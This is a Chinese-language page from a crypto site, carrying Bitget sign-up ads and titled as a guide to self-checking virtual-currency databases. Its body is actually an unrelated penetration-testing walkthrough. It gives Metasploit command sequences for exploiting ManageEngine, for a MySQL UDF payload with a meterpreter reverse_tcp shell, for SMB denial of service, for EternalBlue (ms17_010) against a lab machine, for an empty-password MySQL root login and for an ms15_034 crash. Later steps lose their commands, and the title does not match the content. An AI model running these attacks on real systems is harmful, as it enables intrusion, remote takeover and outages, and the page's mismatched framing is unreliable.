网站首页 > 币百科 >

虚拟货币怎么自查数据库

2023-07-15 14:46:12 币百科 阅读 0

Bitget下载

注册下载Bitget下载,邀请好友,即有机会赢取 3,000 USDT

APP下载   官网注册

1、攻击windows服务器漏洞

用nmap对网段进行扫描nmap -sP 192.168. 在进行IP扫描

发现Windows服务器漏洞

步骤:

msfconsole---进入渗透模块

search manageengine-------搜索渗透模块

search reverse_http---------搜索http渗透模块

use exploit/windows/http/manageeine_connectionid_write--------使用该渗透模块

set rhosts 192.168.

set rport 8022

set LpORT 8080

run -----------------设置攻击目标地址,攻击目标端口,回连的端口号:

2、MYSQL数据库漏洞

nmap 192.168.-----扫描端口漏洞

步骤:

msfconsole-------进入渗透模式

search mysql-------扫描数据库渗透版本

use exploit/multi/mysql/mysql_udf_payload----------使用该渗透版本进行渗透

show options

set rhosts 192.168.--------设置攻击端口号

set payload windows/x64/meterpreter/reverse_tcp--------选择该渗透方式进行攻击

run

3、拒绝服务攻击漏洞:

使用nmap 192.168. 对端口号进行扫描发现漏洞

步骤:

msfconsole-------进入渗透模式

search dos/smb/smb-------搜索渗透版本

use auxiliary/dos/smb/smb_loris-------使用该渗透版本进行攻击

show options--------

set rhosts 192.168.--------设置攻击端口号

run-----渗透

4.永恒之蓝漏洞复现

漏洞描述:

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

影响版本:

目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

复现环境:

攻击机:Kali2020.3(IP:192.168.88.143)

靶机:Metasploitable3Win2k8 (IP:192.168.88.140)

复现过程:

  1. 用nmap执行C段扫描

2、打开MSF

在终端输入如下命令打开MSF终端:

搜索ms17_010模块

这里可以得到几个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

执行扫描模块

执行ms17_010攻击模块

5.MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.26.123 –u root

2、登录成功,进入MySQL系统

3、测试效果:

6.http(ms15_034漏洞)

进入msf模块

查看要设置的东西show options

设置攻击ip

攻击前

攻击后,我的是蓝屏1秒后,跳转到立即重启界面

ssh测试

开启端口转发

查看情况

在kali上尝试连接(rdesktop IP)

相关内容

虚拟货币怎么自查数据库文档下载.: PDF DOC TXT

猜你喜欢